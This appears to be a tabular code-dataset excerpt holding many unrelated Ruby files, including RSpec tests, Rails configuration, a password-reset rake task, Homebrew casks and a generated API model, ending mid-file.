hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
3851435aade570f2195bbad15a29c1991b7467ee | 80 | c
s tc:255:255:255:255:89:1:0:0:1:1:211
t 0:182:0:0:182:0
t 182:0:182:182:0:182
| 16 | 37 | 0.65 |
fff39c85723946744f864df8549936e86e88ffe5 | 4,886 | require_relative '../../controller/PostController'
# Unit specs for PostController. Every collaborator (Posts, Hashtags) is
# stubbed with doubles, so the examples run without a database or network.
# NOTE(review): indentation was lost in this dump; only comments were added.
describe PostController do
before :each do
@stub_client = double
@controller = PostController.new
@posts = Posts.new({ "id": 0, "post_text": 'saya #aku', "attachment": 'a.png', "user_id": 1, "hashtag": ['aku'] })
@arr = [Posts.new({ "id": 0, "post_text": 'saya #aku', "attachment": 'a.png', "user_id": 1, "hashtag": ['aku'] })]
@response = { 'id' => 1, 'post_text' => 'saya #aku', 'attachment' => 'a.png', 'user_id' => 1, 'date' => nil,
'hashtag' => ['aku'] }
@response_nofile = { 'id' => 1, 'post_text' => 'saya #aku', 'attachment' => nil, 'user_id' => 1, 'date' => nil,
'hashtag' => ['aku'] }
@posts_nofile = Posts.new({ "id": 0, "post_text": 'saya #aku', "attachment": nil, "user_id": 1,
"hashtag": ['aku'] })
@hash = ['aku']
end
# Hashtag lookup simply forwards whatever Posts.get_post_by_hashtag returns
# (success payload or 404 payload).
describe 'get_post_by_hash' do
context 'when params hashtag valid' do
it 'return post' do
params = 'aku'
data =
{
'status' => 200,
'message' => 'Success',
'data' => @response
}
allow(Posts).to receive(:get_post_by_hashtag).with(params).and_return(data)
result = @controller.get_post_by_hash(params)
expect(result).to eq(data)
end
end
context 'when params hashtag not valid' do
it 'return status 404' do
params = nil
data =
{
'status' => 404,
'message' => 'Not found Post Based on hashtags name'
}
allow(Posts).to receive(:get_post_by_hashtag).with(params).and_return(data)
result = @controller.get_post_by_hash(params)
expect(result).to eq(data)
end
end
end
# Timeline fetch passes through the model result (array of posts or false).
describe 'get_post_based_time' do
context 'when posts not nil' do
it 'return posts' do
allow(Posts).to receive(:get_post_by_time).and_return(@arr)
result = @controller.get_post_based_time
expect(result).to eq(@arr)
end
end
context 'when posts nil' do
it 'return false' do
allow(Posts).to receive(:get_post_by_time).and_return(false)
result = @controller.get_post_based_time
expect(result).to eq(false)
end
end
end
# Save: stubs the whole pipeline (Posts#save -> Posts.get_post -> Hashtags
# persistence) and checks the controller's status envelope for the
# with-attachment, invalid-params, and nil-attachment paths.
describe 'save' do
context 'when params is valid' do
it 'create posts and return 200' do
params =
{
'files' => 'a.png',
'text' => 'saya #aku',
'user_id' => 1
}
data =
{
'status' => 200,
'message' => 'Success',
'data' => @response
}
allow(Hashtags).to receive(:get_hashtag).with(params['text']).and_return(@hash)
allow(Posts).to receive(:new).and_return(@stub_client)
allow(@stub_client).to receive(:save).and_return(1)
allow(Posts).to receive(:get_post).with(1).and_return(@posts)
stub_hashtag = double
allow(Hashtags).to receive(:new).and_return(stub_hashtag)
allow(stub_hashtag).to receive(:save_hashtags)
allow(stub_hashtag).to receive(:save_postshashtag).with(1)
expected_result = @controller.save(params, 'a.png')
expect(expected_result).to eq(data)
end
end
context 'when params is not valid' do
it 'return status 500' do
params =
{
'files' => 'a.png',
'user_id' => 1
}
data =
{
'status' => 500,
'message' => 'Error'
}
allow(Hashtags).to receive(:get_hashtag).with(params['text']).and_return(@hash)
allow(Posts).to receive(:new).and_return(@stub_client)
allow(@stub_client).to receive(:save).and_return(false)
expected_result = @controller.save(params, 'a.png')
expect(expected_result).to eq(data)
end
end
context 'when attachment is nil' do
it 'return status 200' do
params =
{
'files' => nil,
'text' => 'saya #aku',
'user_id' => 1
}
data =
{
'status' => 200,
'message' => 'Success',
'data' => @response_nofile
}
allow(Hashtags).to receive(:get_hashtag).with(params['text']).and_return(@hash)
allow(Posts).to receive(:new).and_return(@stub_client)
allow(@stub_client).to receive(:save).and_return(1)
allow(Posts).to receive(:get_post).with(1).and_return(@posts_nofile)
stub_hashtag = double
allow(Hashtags).to receive(:new).and_return(stub_hashtag)
allow(stub_hashtag).to receive(:save_hashtags)
allow(stub_hashtag).to receive(:save_postshashtag).with(1)
expected_result = @controller.save(params, nil)
expect(expected_result).to eq(data)
end
end
end
end
| 32.357616 | 118 | 0.554237 |
d54facd196cd4bc01a298bc3edf80fbadb94bcc9 | 207 | module Querkle
# Authorization helpers intended to be mixed into controllers.
module ControllerExtensions
# Delegates an authorization check to the current user's compiled role;
# Role#authorize! is expected to raise when access is denied.
def authorize!(*args)
current_role.authorize!(*args)
end
# Compiles and memoizes (per instance/request) the Role for the signed-in
# user. Relies on a `current_user` method provided by the host controller.
def current_role
@current_role ||= Role.compile(current_user)
end
end
end
| 17.25 | 50 | 0.68599 |
6ab23621f83f8af1a31bc68acf0dbe33982ada73 | 919 | module ArticleJSON
module Export
module AMP
module Elements
# Base class for AMP element exporters; mixes in the shared HTML element
# behaviour and overrides the AMP-specific hooks below.
class Base
include ArticleJSON::Export::Common::HTML::Elements::Base
# List of custom element tags used by this element
# (subclasses override; the base element uses none)
# @return [Array[Symbol]]
def custom_element_tags
[]
end
class << self
# Return the module namespace this class and its subclasses are
# nested in
# @return [Module]
def namespace
ArticleJSON::Export::AMP::Elements
end
private
# The format this exporter is returning. This is used to determine
# which custom element exporters should be applied from the
# configuration.
# @return [Symbol]
def export_format
:amp
end
end
end
end
end
end
end
| 24.837838 | 78 | 0.529924 |
e81baf644afd9b3f088c15850416bdf392d3bf8a | 455 | Rails.application.assets.logger = Logger.new(RUBY_PLATFORM =~ /(win|w)32$/ ? "NUL" : "/dev/null")
Rails::Rack::Logger.class_eval do
# Silences asset-pipeline request noise: while a request whose path starts
# with /assets/ is handled, the logger level is raised to ERROR, then
# restored after the downstream call (tap returns the response unchanged).
def call_with_quiet_assets(env)
previous_level = Rails.logger.level
Rails.logger.level = Logger::ERROR if env['PATH_INFO'].index("/assets/") == 0
call_without_quiet_assets(env).tap do
Rails.logger.level = previous_level
end
end
# NOTE(review): alias_method_chain was removed in Rails 5 — this patch
# presumably targets Rails 4.x; migrate to Module#prepend when upgrading.
alias_method_chain :call, :quiet_assets
end
| 35 | 99 | 0.681319 |
01075be9a5615c183439043b8bc4cfd99325fde4 | 5,009 | Rails.application.configure do
# NOTE(review): standard Rails-generated production defaults; comments below
# are the generator's own. Only deviations from the template should need review.
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress CSS using a preprocessor.
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Mount Action Cable outside main process or domain.
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment).
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "codeblue_production"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Inserts middleware to perform automatic connection switching.
# The `database_selector` hash is used to pass options to the DatabaseSelector
# middleware. The `delay` is used to determine how long to wait after a write
# to send a subsequent read to the primary.
#
# The `database_resolver` class is used by the middleware to determine which
# database is appropriate to use based on the time delay.
#
# The `database_resolver_context` class is used by the middleware to set
# timestamps for the last write to the primary. The resolver uses the context
# class timestamps to determine how long to wait before reading from the
# replica.
#
# By default Rails will store a last write timestamp in the session. The
# DatabaseSelector middleware is designed as such you can define your own
# strategy for connection switching and pass that into the middleware through
# these configuration options.
# config.active_record.database_selector = { delay: 2.seconds }
# config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
# config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
end
| 44.327434 | 114 | 0.762228 |
18384c223045901e64fe88fa231653d4126c67b5 | 632 | require_dependency 'core/application_record'
module Core
module Regularization
# Answer attached to a regularization solicitation (extranet schema).
class SolicitationAnswer < ApplicationRecord # :nodoc:
self.table_name = 'extranet.regularization_solicitation_answers'
belongs_to :solicitation, required: false, class_name: 'Core::Regularization::Solicitation'
# NOTE(review): `foreign_key: :request_id` matches the Rails default for
# `belongs_to :request`; `required: false` is the pre-Rails-5 spelling of
# `optional: true` — confirm target Rails version before modernizing.
belongs_to :request, required: false, class_name: 'Core::Regularization::SolicitationRequest', foreign_key: :request_id
has_many :solicitation_documents
validates :answer, presence: true
# Drops the Core::Regularization namespace from the model name so routes,
# form params and i18n keys use plain 'SolicitationAnswer'.
def self.model_name
ActiveModel::Name.new(self, nil, 'SolicitationAnswer')
end
end
end
end
| 37.176471 | 125 | 0.75 |
ab9660e55cb3d1d5ff23d406c96d3c5fef8dd4bc | 74 | class GopayPayment < ApplicationRecord
# Shared Gopay model behaviour — see Gopay::Mixins::Model for what is mixed in.
include Gopay::Mixins::Model
end
| 18.5 | 38 | 0.810811 |
7a0234a17e270093dc572aad9980252a7a534511 | 2,008 | # frozen_string_literal: true
require 'io/console'
namespace :password do
  namespace :master do
    desc 'Reset password for a master user'
    # Usage: rake "password:master:reset[email_or_username,password]"
    # Any missing argument is prompted for interactively (password input is
    # read with echo disabled). Exits with status 1 on any failure.
    task(:reset, %i[email_or_username password] => [:environment]) do |_task, args|
      # NOTE(review): `def` inside a task block defines these helpers on
      # Object (globally) — acceptable for a one-off maintenance task.
      def say(message, icon = :info)
        puts "[#{emoji(icon)}] " + message.to_s
      end

      # Maps a status symbol to a coloured terminal glyph.
      def emoji(icon)
        case icon
        when :question
          "\e[34m?\e[0m"             # blue '?'
        when :info
          "\e[36m\xE2\x84\xB9\e[0m"  # cyan information symbol
        when :ok
          "\e[32m\xE2\x9C\x94\e[0m"  # green check mark
        when :fail
          # FIX: failure glyph was green (\e[32m) — render the cross in red.
          "\e[31m\xE2\x9C\x96 \e[0m"
        else
          "....."
        end
      end

      say "You are about to change the password of a user of Master tenant"
      email = args.email_or_username
      password = args.password
      password_confirmation = args.password

      if email.blank?
        say "Please give the email or username of the user", :question
        email = STDIN.gets
        email.chomp!
      end

      # Look the user up by email OR username within the master account.
      user = Account.master.users.where.has { |t| (t.email == email) | (t.username == email) }.first
      unless user
        say "Can't find User `#{email}`", :fail
        exit 1
      end

      if password.blank?
        loop do
          say "Please enter the NEW password", :question
          password = STDIN.noecho(&:gets).chomp
          break if password.present?
        end
        loop do
          say "Please confirm the password", :question
          password_confirmation = STDIN.noecho(&:gets).chomp
          break if password_confirmation.present?
        end
        if password != password_confirmation
          say "Password and confirmation does not match", :fail
          exit 1
        end
      end

      user.password = user.password_confirmation = password
      if user.save
        say "`#{email}` password has been changed successfully", :ok
      else
        # FIX: error path previously used the default :info icon.
        say "Error in saving #{email} password", :fail
        say user.errors.full_messages.join("\n"), :info
        exit 1
      end
    end
  end
end
| 27.135135 | 100 | 0.574203 |
ab6ee345545494926421110f1219feb9672db364 | 5,163 | =begin
#Selling Partner API for Merchant Fulfillment
#The Selling Partner API for Merchant Fulfillment helps you build applications that let sellers purchase shipping for non-Prime and Prime orders using Amazon’s Buy Shipping Services.
OpenAPI spec version: v0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.26
=end
require 'date'
# NOTE(review): this file is auto-generated by swagger-codegen (see header);
# prefer regenerating from the OpenAPI spec over hand-editing.
module AmzSpApi::MerchantFulfillmentApiModel
  # The phone number.
  class PhoneNumber
    # Attribute mapping from ruby-style variable name to JSON key.
    # (Empty: this model declares no attributes in the spec.)
    def self.attribute_map
      {
      }
    end
    # Attribute type mapping.
    def self.swagger_types
      {
      }
    end
    # Initializes the object
    # @param [Hash] attributes Model attributes in the form of hash
    def initialize(attributes = {})
      return unless attributes.is_a?(Hash)
      # convert string to symbol for hash key
      attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
    end
    # Show invalid properties with the reasons. Usually used together with valid?
    # @return Array for valid properties with the reasons
    def list_invalid_properties
      invalid_properties = Array.new
      invalid_properties
    end
    # Check to see if the all the properties in the model are valid
    # @return true if the model is valid
    def valid?
      true
    end
    # Checks equality by comparing each attribute.
    # @param [Object] Object to be compared
    def ==(o)
      return true if self.equal?(o)
      self.class == o.class
    end
    # @see the `==` method
    # @param [Object] Object to be compared
    def eql?(o)
      self == o
    end
    # Calculates hash code according to all attributes.
    # @return [Fixnum] Hash code
    def hash
      [].hash
    end
    # Builds the object from hash
    # @param [Hash] attributes Model attributes in the form of hash
    # @return [Object] Returns the model itself
    def build_from_hash(attributes)
      return nil unless attributes.is_a?(Hash)
      self.class.swagger_types.each_pair do |key, type|
        if type =~ /\AArray<(.*)>/i
          # check to ensure the input is an array given that the attribute
          # is documented as an array but the input is not
          if attributes[self.class.attribute_map[key]].is_a?(Array)
            self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
          end
        elsif !attributes[self.class.attribute_map[key]].nil?
          self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
        end # or else data not found in attributes(hash), not an issue as the data can be optional
      end
      self
    end
    # Deserializes the data based on type
    # @param string type Data type
    # @param string value Value to be deserialized
    # @return [Object] Deserialized data
    def _deserialize(type, value)
      case type.to_sym
      when :DateTime
        DateTime.parse(value)
      when :Date
        Date.parse(value)
      when :String
        value.to_s
      when :Integer
        value.to_i
      when :Float
        value.to_f
      when :BOOLEAN
        if value.to_s =~ /\A(true|t|yes|y|1)\z/i
          true
        else
          false
        end
      when :Object
        # generic object (usually a Hash), return directly
        value
      when /\AArray<(?<inner_type>.+)>\z/
        inner_type = Regexp.last_match[:inner_type]
        value.map { |v| _deserialize(inner_type, v) }
      when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
        k_type = Regexp.last_match[:k_type]
        v_type = Regexp.last_match[:v_type]
        {}.tap do |hash|
          value.each do |k, v|
            hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
          end
        end
      else # model
        temp_model = AmzSpApi::MerchantFulfillmentApiModel.const_get(type).new
        temp_model.build_from_hash(value)
      end
    end
    # Returns the string representation of the object
    # @return [String] String presentation of the object
    def to_s
      to_hash.to_s
    end
    # to_body is an alias to to_hash (backward compatibility)
    # @return [Hash] Returns the object in the form of hash
    def to_body
      to_hash
    end
    # Returns the object in the form of hash
    # @return [Hash] Returns the object in the form of hash
    def to_hash
      hash = {}
      self.class.attribute_map.each_pair do |attr, param|
        value = self.send(attr)
        next if value.nil?
        hash[param] = _to_hash(value)
      end
      hash
    end
    # Outputs non-array value in the form of hash
    # For object, use to_hash. Otherwise, just return the value
    # @param [Object] value Any valid value
    # @return [Hash] Returns the value in the form of hash
    def _to_hash(value)
      if value.is_a?(Array)
        value.compact.map { |v| _to_hash(v) }
      elsif value.is_a?(Hash)
        {}.tap do |hash|
          value.each { |k, v| hash[k] = _to_hash(v) }
        end
      elsif value.respond_to? :to_hash
        value.to_hash
      else
        value
      end
    end
  end
end
| 29.169492 | 182 | 0.629866 |
6144446aafa44654e83b19c52673e4d96c103d7b | 5,535 | describe PglogicalSubscription do
# Fixture data: raw subscription hashes as returned by the pglogical gem,
# including a DSN with escaped quotes to exercise the parser.
let(:subscriptions) do
[
{
"subscription_name" => "subscription_example_com",
"status" => "replicating",
"provider_node" => "region_0",
"provider_dsn" => "dbname = 'vmdb\\'s_test' host='example.com' user='root' port='' password='p=as\\' s\\''",
"slot_name" => "pgl_vmdb_test_region_0_subscripdb71d61",
"replication_sets" => ["miq"],
"forward_origins" => ["all"]
},
{
"subscription_name" => "subscription_test_example_com",
"status" => "disabled",
"provider_node" => "region_1",
"provider_dsn" => "dbname = vmdb_test2 host=test.example.com user = postgres port=5432 fallback_application_name='bin/rails'",
"slot_name" => "pgl_vmdb_test_region_1_subscripdb71d61",
"replication_sets" => ["miq"],
"forward_origins" => ["all"]
}
]
end
# Expected attribute hashes after the model parses the DSNs above.
let(:expected_attrs) do
[
{
"id" => "subscription_example_com",
"status" => "replicating",
"dbname" => "vmdb's_test",
"host" => "example.com",
"user" => "root",
"provider_region" => 0,
"provider_region_name" => "The region"
},
{
"id" => "subscription_test_example_com",
"status" => "disabled",
"dbname" => "vmdb_test2",
"host" => "test.example.com",
"user" => "postgres",
"port" => 5432,
"provider_region" => 1
}
]
end
let(:pglogical) { double }
# NOTE(review): FactoryGirl was renamed FactoryBot — update when the suite's
# dependencies are modernized.
before do
FactoryGirl.create(:miq_region, :region => 0, :description => "The region")
allow(described_class).to receive(:pglogical).and_return(pglogical)
end
describe ".find" do
context "with records" do
before do
allow(pglogical).to receive(:subscriptions).and_return(subscriptions)
allow(pglogical).to receive(:enabled?).and_return(true)
end
it "retrieves all the records with :all" do
actual_attrs = described_class.find(:all).map(&:attributes)
expect(actual_attrs).to match_array(expected_attrs)
end
it "retrieves the first record with :first" do
rec = described_class.find(:first)
expect(rec.attributes).to eq(expected_attrs.first)
end
it "retrieves the last record with :last" do
rec = described_class.find(:last)
expect(rec.attributes).to eq(expected_attrs.last)
end
end
context "with no records" do
before do
allow(pglogical).to receive(:subscriptions).and_return([])
allow(pglogical).to receive(:enabled?).and_return(true)
end
it "returns an empty array with :all" do
expect(described_class.find(:all)).to be_empty
end
it "returns nil with :first" do
expect(described_class.find(:first)).to be_nil
end
it "returns nil with :last" do
expect(described_class.find(:last)).to be_nil
end
end
context "with pglogical disabled" do
before do
allow(pglogical).to receive(:enabled?).and_return(false)
end
it "returns an empty array with :all" do
expect(described_class.find(:all)).to be_empty
end
it "returns nil with :first" do
expect(described_class.find(:first)).to be_nil
end
it "returns nil with :last" do
expect(described_class.find(:last)).to be_nil
end
end
end
describe "#save!" do
it "creates the node when there are no subscriptions" do
allow(pglogical).to receive(:subscriptions).and_return([])
allow(pglogical).to receive(:enabled?).and_return(true)
# node created
expect(pglogical).to receive(:enable)
expect(pglogical).to receive(:node_create).and_return(double(:check => nil))
# subscription is created
expect(pglogical).to receive(:subscription_create) do |name, dsn, replication_sets, sync_structure|
expect(name).to eq("subscription_test_2_example_com")
expect(dsn).to include("host='test-2.example.com'")
expect(dsn).to include("user='root'")
expect(replication_sets).to eq(['miq'])
expect(sync_structure).to be false
end.and_return(double(:check => nil))
described_class.new(:host => "test-2.example.com", :user => "root").save!
end
it "raises when an existing subscription is saved" do
allow(pglogical).to receive(:subscriptions).and_return(subscriptions)
allow(pglogical).to receive(:enabled?).and_return(true)
sub = described_class.find(:first)
sub.host = "other-host.example.com"
expect { sub.save! }.to raise_error("Cannot update an existing subscription")
end
end
describe "#delete" do
# Deleting the last subscription must also drop the pglogical node and
# destroy the provider region's rows.
it "drops the node when this is the last subscription" do
allow(pglogical).to receive(:enabled?).and_return(true)
allow(pglogical).to receive(:subscriptions).and_return([subscriptions.first], [])
sub = described_class.find(:first)
expect(pglogical).to receive(:subscription_drop).with("subscription_example_com", true)
expect(MiqRegion).to receive(:destroy_region)
.with(instance_of(ActiveRecord::ConnectionAdapters::PostgreSQLAdapter), 0)
expect(pglogical).to receive(:node_drop).with("region_#{MiqRegion.my_region_number}", true)
sub.delete
end
end
end
| 33.75 | 139 | 0.609575 |
1a97850468dc2d7651290f3e1b4af2143589616a | 678 | cask "robo-3t" do
# Version is "app_version,build_hash"; the pieces are split back apart in `url`.
version "1.4.1,122dbd9"
sha256 "02cf60fd969e7c2f7037bb567f558e436618f9a707904f786d1f03f97193a263"
# download.studio3t.com was verified as official when first introduced to the cask
url "https://download.studio3t.com/robomongo/mac/robo3t-#{version.before_comma}-darwin-x86_64-#{version.after_comma}.dmg"
# NOTE(review): the `appcast` stanza is deprecated in current Homebrew —
# replace with a `livecheck` block the next time this cask is touched.
appcast "https://github.com/Studio3T/robomongo/releases.atom"
name "Robo 3T (formerly Robomongo)"
desc "MongoDB management tool (formerly Robomongo)"
homepage "https://robomongo.org/"
app "Robo 3T.app"
uninstall quit: "Robo 3T"
zap trash: [
"~/.3T/robo-3t/",
"~/Library/Saved Application State/Robo 3T.savedState",
]
end
| 32.285714 | 123 | 0.740413 |
e847aadb99656a3ec95154a31e00755a0357151a | 2,141 | # Include this file into your view layer. For example, in Rails:
#
# module ApplicationHelper
# include Microformats::Helpers
# end
#
module Microformats::Helpers
# Renders an hCard (vCard) microformat wrapper.
#
# OPTIONS:
# * :tag - the HTML wrapper element (defaults to :div)
# * any other key becomes an HTML attribute on the wrapper.
#
# EXAMPLE:
#   <% vcard :id => 'my_vcard' do |card| %>
#     Hello, my name is <%= card.name "Chris" %>!
#   <% end %>
#
def vcard(opts = {}, &block)
  Microformats::Vcard.new(self).run(opts, &block)
end
# Renders an adr (address) microformat wrapper.
#
# OPTIONS:
# * :type - the kind of address ('home', 'work', ...)
# * :tag  - the HTML wrapper element (defaults to :div)
# * any other key becomes an HTML attribute on the wrapper.
#
# EXAMPLE:
#   <% vaddress :type => 'work', :id => 'my_adr' do |adr| %>
#     I live at <%= adr.street "123 Main St" %>.
#   <% end %>
#
def vaddress(opts = {}, &block)
  Microformats::Address.new(self).run(opts, &block)
end
# Renders an hCalendar event (vEvent) microformat wrapper.
#
# OPTIONS:
# * :tag - the HTML wrapper element (defaults to :div)
# * any other key becomes an HTML attribute on the wrapper.
#
# EXAMPLE:
#   <% vevent :id => 'my_event' do |event| %>
#     This event is called <%= event.name "Cool Event" %>.
#   <% end %>
#
def vevent(opts = {}, &block)
  Microformats::Event.new(self).run(opts, &block)
end
# Renders an hCalendar (vCalendar) microformat wrapper; events are nested
# inside via the yielded calendar object.
#
# OPTIONS:
# * :tag - the HTML wrapper element (defaults to :div)
# * any other key becomes an HTML attribute on the wrapper.
#
# EXAMPLE:
#   <% vcalendar :id => 'my_cal' do |cal| %>
#     <% cal.event :id => 'my_event' do |event| %>
#       This event is called <%= event.name "Cool Event" %>.
#     <% end %>
#   <% end %>
#
def vcalendar(opts = {}, &block)
  Microformats::Calendar.new(self).run(opts, &block)
end
end | 28.932432 | 78 | 0.601121 |
1d7d91d97a5e17d2e9d9b132f34cd51388dabe16 | 540 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
require File.expand_path('../shared/take', __FILE__)
describe "Enumerable#first" do
# NOTE(review): the empty-collection assertion here duplicates the second
# example below; kept as-is to match the upstream spec suite.
it "returns the first element" do
EnumerableSpecs::Numerous.new.first.should == 2
EnumerableSpecs::Empty.new.first.should == nil
end
it "returns nil if self is empty" do
EnumerableSpecs::Empty.new.first.should == nil
end
# With an argument, #first behaves like #take — reuse the shared examples.
describe "when passed an argument" do
it_behaves_like :enumerable_take, :first
end
end
| 28.421053 | 58 | 0.727778 |
624fb9de2eb4ec1617895c511c015fb9379fa30c | 1,104 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'aruba/rspec/version'
Gem::Specification.new do |spec|
spec.name = "aruba-rspec"
spec.version = Aruba::RSpec::VERSION
spec.authors = ["Eric Saxby"]
spec.email = %w([email protected])
spec.summary = %q{Bridge RSpec and Aruba to test command-line tools}
spec.description = %q{Aruba and ArubaDoubles help to test command-line tools, but they are build around Cucumber. This gem helps integrate with RSpec.}
spec.homepage = "https://github.com/livinginthepast/aruba-rspec"
spec.license = "MIT"
# Package every git-tracked file; expose bin/ entries as executables.
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency 'rspec', '>= 3.0'
spec.add_dependency 'aruba'
spec.add_dependency 'aruba-doubles'
spec.add_development_dependency "bundler"
spec.add_development_dependency "rake"
end
| 40.888889 | 155 | 0.682971 |
6281368fadaad767da8dc20b856abd28da971cbc | 352 | require 'ruby2ruby'
module Reek
module Source
#
# Formats snippets of syntax tree back into Ruby source code.
#
class SexpFormatter
# Converts +sexp+ back into Ruby source. Non-array values are simply
# stringified. The YAML dump/load round-trip deep-copies the sexp —
# presumably so Ruby2Ruby's processing cannot mutate the caller's tree;
# TODO(review): confirm before replacing with a cheaper copy.
def self.format(sexp)
return sexp.to_s unless Array === sexp
sexp = Sexp.from_array(YAML::load(YAML::dump(sexp)))
Ruby2Ruby.new.process(sexp)
end
end
end
end
| 19.555556 | 65 | 0.636364 |
5d8dae1f462060f196970ce5cfec34c9335f8e73 | 423 | cask 'gisto' do
version '1.10.26'
sha256 'e63854a615f3e1a0f6a5d32b7fa83119da1861230fe01301e677e3d98775021b'
# github.com/Gisto/Gisto was verified as official when first introduced to the cask
url "https://github.com/Gisto/Gisto/releases/download/v#{version}/Gisto-#{version}.dmg"
# NOTE(review): `appcast` is deprecated in current Homebrew — migrate to a
# `livecheck` block on the next update.
appcast 'https://github.com/Gisto/Gisto/releases.atom'
name 'Gisto'
homepage 'https://www.gistoapp.com/'
app 'Gisto.app'
end
| 32.538462 | 89 | 0.756501 |
081f3d63dfc366f9bca421fc24459830e76a4caa | 1,780 | # -*- coding: utf-8 -*-
module Kindai
# Downloads a single two-page spread image of a book to
# <book_path>/original/NNN.jpg, retrying transient network failures.
class SpreadDownloader
attr_accessor :spread
attr_accessor :retry_count
attr_accessor :book_path
# Factory: wraps a Kindai::Spread with default retry count and target path.
def self.new_from_spread(spread)
raise TypeError, "#{spread} is not Kindai::Spread" unless spread.is_a? Kindai::Spread
me = self.new
me.spread = spread
me.retry_count = 30
me.book_path = Pathname.new(ENV["HOME"]).to_s
me
end
# Downloads the spread unless it is already on disk.
# Returns false when skipped, true when downloaded.
def download
return false if self.has_file?
self.create_directory
self.download_spread
return true
end
# Ensures <book_path>/original exists (single level only, hence Dir.mkdir).
def create_directory
path = File.join self.book_path, "original"
Dir.mkdir(path) unless File.directory?(path)
end
# Absolute path of the target JPEG, zero-padded by spread number.
def spread_path
path = File.join self.book_path, "original", "%03d.jpg" % self.spread.spread_number
File.expand_path path
end
# Removes the downloaded file; returns true on success, false if missing.
def delete
return File.delete(self.spread_path) && true rescue false
end
# True when the file exists AND is non-empty (File.size? returns nil for
# empty/missing files).
def has_file?
File.size? self.spread_path
end
protected
# Fetches the image with bounded retries. Interrupt aborts the process;
# other errors sleep 20s and retry up to retry_count times before
# re-raising. NOTE(review): the attempt counter allows retry_count + 1
# total attempts — confirm that is the intended semantics.
def download_spread
failed_count = 0
begin
Kindai::Util.logger.info "downloading " + [self.spread.book.author, self.spread.book.title, "spread #{self.spread.spread_number} / #{self.spread.book.total_spread}"].join(' - ')
Kindai::Util.rich_download(spread.image_uri, self.spread_path)
rescue Interrupt => err
Kindai::Util.logger.error "#{err.class}: #{err.message}"
exit 1
rescue StandardError, TimeoutError => err
Kindai::Util.logger.warn "failed (#{failed_count+1}/#{self.retry_count}) #{err.class}: #{err.message}"
raise err if failed_count == self.retry_count
Kindai::Util.logger.info "sleep and retry"
failed_count += 1
sleep 20
retry
end
end
end
end
| 26.969697 | 185 | 0.646067 |
39642cdfe17cd24e7faf7c5e08813cc869c125c3 | 314 | class AddCommitAccessPermission < ActiveRecord::Migration
# Grants :commit_access to every custom (non-builtin) role.
def self.up
  Role.all.reject(&:builtin?).each { |role| role.add_permission!(:commit_access) }
end
# Revokes :commit_access from every custom (non-builtin) role.
def self.down
  Role.all.reject(&:builtin?).each { |role| role.remove_permission!(:commit_access) }
end
end
| 22.428571 | 57 | 0.665605 |
6ab50b30dee68153a185e40cfc2c5cfc6e518b54 | 4,856 | require 'spec_helper'
# Unit specs for ZabbixApi::Templates — the API client is a double, so no
# Zabbix server is needed. FIX: three context descriptions read
# "doesn not" — corrected to "does not".
describe 'ZabbixApi::Templates' do
